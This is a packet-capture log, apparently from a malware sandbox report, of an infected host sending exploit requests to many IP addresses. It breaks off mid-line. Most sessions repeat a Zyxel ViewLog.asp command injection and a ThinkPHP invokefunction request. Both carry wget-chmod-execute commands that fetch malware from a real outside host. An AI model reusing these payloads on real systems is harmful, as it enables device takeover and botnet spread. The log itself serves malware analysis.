Nov 22, 2023 08:40:33.788997889 CET	19725	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:38.396354914 CET	19761	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:47.355159044 CET	19769	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:06.296407938 CET	19781	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
975	192.168.2.23	41852	85.214.209.73	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.771694899 CET	19364	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:30.813307047 CET	19495	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:32.029176950 CET	19602	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:34.556790113 CET	19752	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:39.420141935 CET	19762	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:49.147078037 CET	19771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:08.344208956 CET	19782	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
976	192.168.2.23	55578	94.122.114.208	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.982230902 CET	19367	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
977	192.168.2.23	51792	94.120.245.39	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.985817909 CET	19368	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
978	192.168.2.23	52588	62.29.100.254	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.985948086 CET	19368	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
979	192.168.2.23	60744	95.35.51.134	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.055452108 CET	19369	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
980	192.168.2.23	52850	94.30.46.246	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.127037048 CET	19370	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:30.308880091 CET	19404	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
981	192.168.2.23	60910	31.136.1.199	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.133133888 CET	19370	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:33.277065039 CET	19699	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:39.420142889 CET	19762	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:51.450542927 CET	19772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:16.535114050 CET	19785	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
982	192.168.2.23	41924	94.121.68.153	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.176220894 CET	19371	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:34.300827980 CET	19750	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:40.444005013 CET	19764	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:52.474436998 CET	19774	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:16.535125017 CET	19786	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
983	192.168.2.23	47050	95.100.34.118	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.413516045 CET	19454	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:30.749711990 CET	19470	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:30 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Nov 22, 2023 08:40:30.798208952 CET	19494	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:30 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Nov 22, 2023 08:40:30.898454905 CET	19496	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:30 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
984	192.168.2.23	53684	112.125.187.162	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.507237911 CET	19466	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:32.157288074 CET	19603	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:32.476346970 CET	19665	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:33 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
985	192.168.2.23	54376	88.221.129.187	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:30.808640003 CET	19494	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:30.982698917 CET	19497	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:30 GMT Date: Wed, 22 Nov 2023 07:40:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 62 38 31 64 64 35 38 26 